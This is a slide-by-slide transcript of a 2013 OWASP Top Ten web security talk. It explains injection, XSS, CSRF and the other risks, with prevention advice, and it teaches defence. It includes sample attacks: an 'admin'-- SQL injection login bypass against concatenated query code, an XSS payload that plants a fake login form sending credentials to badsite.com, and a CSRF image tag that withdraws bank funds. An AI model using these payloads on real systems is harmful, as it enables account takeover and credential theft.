The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
2 likes•4,389 views
The OWASP Top Ten document outlines the most critical web application security risks, published in 2013, highlighting issues such as injection, broken authentication, cross-site scripting, and security misconfiguration. It emphasizes the prevalence and impact of these vulnerabilities while providing guidance on prevention techniques. The document serves as a foundational reference for improving web application security practices.
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
- 1. OWASP The OWASP Foundation http://www.owasp.org The OWASP Top Ten Most Critical Web Application Security Risks 2013/12/04 Simon Bennetts Mozilla Security Team, OWASP ZAP Project Lead [email protected] Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
- 2. The OWASP Top Ten • Most Critical Web Application Security Risks Threat Agent Attack Vector Easy Weakness Prevalence Widespread Weakness Detectability Easy Technical Impact Severe Business Impact ? ? ? Average Common Average Moderate ? ? Difficult Uncommon Difficult Minor ? • A great place to start • Current list published in 2013 • Well known and well regarded • But … the vast majority of websites still have a high, critical or urgent issue 2
- 3. The OWASP Top Ten A1: Injection A2: Broken Authentication and Session Management A3: Cross-Site Scripting (XSS) A4: Insecure Direct Object References A5: Security Misconfiguration A6: Sensitive Data Exposure A7: Mission Function Level Access Control A8: Cross-Site Request Forgery (CSRF) A9: Using Components with Known Vulnerabilities A10: Unvalidated Redirects or Forwards 3
- 4. A1: Injection Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Easy Common Average Severe • Tricking an application into including unintended commands in the data sent to an interpreter • SQL, OS Shell, LDAP, Xpath, Hibernate… • Impact: SEVERE! • Unauthorized application access • Unauthorized data access • OS access… 4
- 6. A1: Injection (SQL) • Example UI: Name: admin ʹ-- Password: ******* Login • Example code: String sql = “SELECT * FROM users where username = ʹ” + username + “ʹ and password = ʹ” + password + “ʹ”; • Expected SQL: SELECT * FROM users where username = ʹadminʹ and password = ʹc0rr3ctʹ 6
- 7. A1: Injection (SQL) • Example UI: Name: admin ʹ-- Password: ******* Login • Example code: String sql = “SELECT * FROM users where username = ʹ” + username + “ʹ and password = ʹ” + password + “ʹ”; • Expected SQL: SELECT * FROM users where username = ʹadminʹ and password = ʹc0rr3ctʹ • Resulting SQL query: SELECT * FROM users where username = ʹadminʹ--ʹ and password = ʹanythingʹ 7
- 8. A1: Injection • Prevention: • Use interfaces that provide a parameterized interface: • Prepared Statements • Stored Procedures • • Encode all user input • • Whitelist input Minimize database privileges OWASP SQL Injection Prevention Cheat sheet 8
- 9. A2: Broken Authentication and Session Management Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Average Widespread Average Severe • HTTP is stateless • Session IDs used to track state, good as credentials to an attacker • Can be accessed via sniffer, logs, XSS… • Change my password, forgotten my password, secret questions … • Impact: sessions hijacked / accounts compromised 9
- 10. A2: Broken Authentication and Session Management • Prevention: • Use standard implementations • Use SSL for ALL requests • Thoroughly test all authentication related functionality • Use SECURE & HTTPOnly cookies flags • Avoid XSS flaws 10
- 11. A3: Cross Site Scripting (XSS) Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Average VERY Widespread Easy Moderate • Injecting malicious content/code into web pages • HTML / javascript most common, but many other technologies also vulnerable: • Java, Active X, Flash, RSS, Atom, … • Present in 68% of all web applications in 2011 • Can be present in form and URL parameters AND cookies 11
- 12. A3: Cross Site Scripting • Impact: (XSS) • Session hijacking • Unauthorized data access • Web page rewriting • Redirect users (eg to phishing or malware sites) • Anything the web application can do… 12
- 13. A2: Cross Site Scripting (XSS) Reflected Persistent 13
- 14. A2: Cross Site Scripting (XSS) DOM 14
- 15. A3: Cross Site Scripting • Forum: “Have you seen XYZ are being taken over?? (XSS) http://tinyurl/jdfgshr” XYZ – We’re being taken over! https://www.xyz.com/s=%3C%2Fdiv%3E%E2%80%9C%3Cscript%3Edocument.title%3D%E2%80%98XYZ%20 Search this site: Yes, we’re being taken over, but don’t worry: login to find out why this is a good thing! Username: Password: Login 15
- 16. A3: Cross Site Scripting (XSS) found! XYZ – No Search Result https://www.xyz.com/s=%3C%2Fdiv%3E%E2%80%9C%3Cscript%3Edocument.title%3D%E2%80%98XYZ%2 Search this site: No search result found for: “</div><script>document.title=‘XYZ – We’re being taken over!’; Document.getElementById(‘results’).style.display=‘none’; </script> Yes, we’re being taken over, but don’t worry: login to find out why this is a good thing! <table><form action=‘http://badsite.com/gotcha’> <tr><td>Username:</td><td><input id=‘user’></td></tr> <tr><td>Password:</td><td><input id=‘password’ type=…” 16
- 17. A3: Cross Site Scripting • View Source: (XSS) : <div id = “results”> <p>No search result found for: </p> <!-- start of users search term --> “ </div><script>document.title=‘XYZ – We’re being taken over!’; Document.getElementById(‘results’).style.display=‘none’; </script> Yes, we’re being taken over, but don’t worry: login to find out why this is a good thing! <table><form action=‘http://badsite.com/gotcha’> <tr><td>Username:</td><td><input id=‘user’></td></tr> <tr><td>Password:</td><td><input id=‘password’ type=… ” <!-- end of users search term --> : 17
- 18. • A3: Cross Site Scripting Prevention: (XSS) • • Whitelist input • Encode output (e.g. using OWASP ESAPI) • • Don’t output user supplied input If you must support user supplied HTML, use libraries like OWASP’s AntiSamy OWASP XSS Prevention Cheat sheet 18
- 19. A4: Insecure Direct Object Reference Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Easy Common Easy Moderate • A direct reference to an object that is not validated on each request • [email protected] • company=Mega%20Corp • account=7352820 • Typically in FORM and URL parameters (cookies less likely) • Impact: accounts and data compromised 19
- 20. A4: Insecure Direct Object Reference • Attacker notices URL: acct=6065 • Modifies it to acct=6066 • Attacker can view (and maybe change?) the victims account 20
- 21. A4: Insecure Direct Object Reference • Prevention: • Use per user or per session indirect object references (ESAPI supports integer and random mapping) • Validate Direct Object References on each request 21
- 22. A5: Security Misconfiguration Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Easy Common Easy Moderate • Another multitude of sins • Server / Application configuration • Lack of server and application hardening • Unpatched OS, services, libraries • Default accounts • Detailed error messages (e.g. stack traces) • Unprotected files and directories 22
- 23. A5: Security Misconfiguration • Impact: • Server compromise • Exploitation of known vulnerabilities • Prevention: • Repeatable server and application hardening process • Patch OS, services, libraries • Strong architecture that ensures secure separation between components 23
- 24. A6: Sensitive Data Exposure Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Difficult Uncommon Average Severe • Exposure of: • Credentials • Credit card numbers • Bank account details • Any sensitive data… • In: Databases, Files, Logs, Backups … 24
- 25. A6: Sensitive Data Exposure • Impact: • Attackers access or modify sensitive data • Attackers use sensitive data in further attacks • Company embarrassment, loss of trust • Company sued or fined 25
- 26. A6: Sensitive Data Exposure • Prevention: • Identify sensitive data • Store as little sensitive data as possible • Protect with suitable mechanisms (file, db, element encryption, SSL) • Only use standard, well recognised algorithms • Check your implementation! 26
- 27. A7: Missing Function Level Access Control Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Easy Common Average Moderate • UI showing navigation to unauthorized functions • Server side authentication or authorization checks missing • Server side checks relying solely on attacker provided information • Impact: • Unauthorized account and data access • Access to administrative functionality 27
- 28. A7: Missing Function Level Access Control • Prevention: • Process for managing entitlements thats easy to update and audit • Deny access by default, require specific grants to specific roles for access to every function • Check workflow for correct state 28
- 29. A8: Cross site request forgery Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Average Common Easy Moderate • Exploits sessions established in other browser windows or tabs • Impact: Attacker can perform any action on behalf of the victim 29
- 30. A8: Cross site request forgery Browser 1 4 example.bank.com $$$ 5 2 3 bad.site.com <img src=“…”> <img src= "https://example.bank.com/withdraw? account=bob&amount=1000000&for=mallory" > 30
- 31. A8: Cross site request forgery • Prevention: • Never allow GETs to change things • Anti CSRF tokens • Viewstate (ASP.NET) • OWASP CSRF Guard • Challenge-Response • Re-Authentication • CAPTCHA 31
- 32. A9: Using Components with Known Vulnerabilities Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Average Widespread Difficult Moderate • As per the title! • Impact: • Full range of weaknesses, including injection, broken access control, XSS … • Minimal → complete host takeover and data compromise 32
- 33. A9: Using Components with Known Vulnerabilities • Prevention: • Identify all components and versions in use • Monitor security of these components • Keep components up to date • Establish security policies governing use • If necessary add wrappers to disable unused or vulnerable aspects of components 33
- 34. A10: Unvalidated Redirects and Forwards Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Average Uncommon Easy Moderate • Redirects are common and send the user to a new site .. which could be malicious if not validated! http://fail.com/redir.php?url=badsite.com • Forwards (Transfers) send the request to a new page in the same application .. which could bypass authentication or authorization http://fail.com/redir.php?url=admin.php 34
- 35. A10: Unvalidated Redirects and Forwards • Impact: • Redirect victim to phishing or malware site • Attacker’s request is forwarded past security checks, allowing unauthorized function or data access • Prevention: • Avoid using them • Dont use user supplied data for destination • Validate any user data that must be used 35
- 36. Where Next? • Read and understand the full document! • Read the OWASP Developers Guide • Watch the OWASP AppSec Tutorial videos on youtube • Re-examine your code! • Introduce a Secure Development Lifecycle • Use tools like the OWASP Zed Attack Proxy 36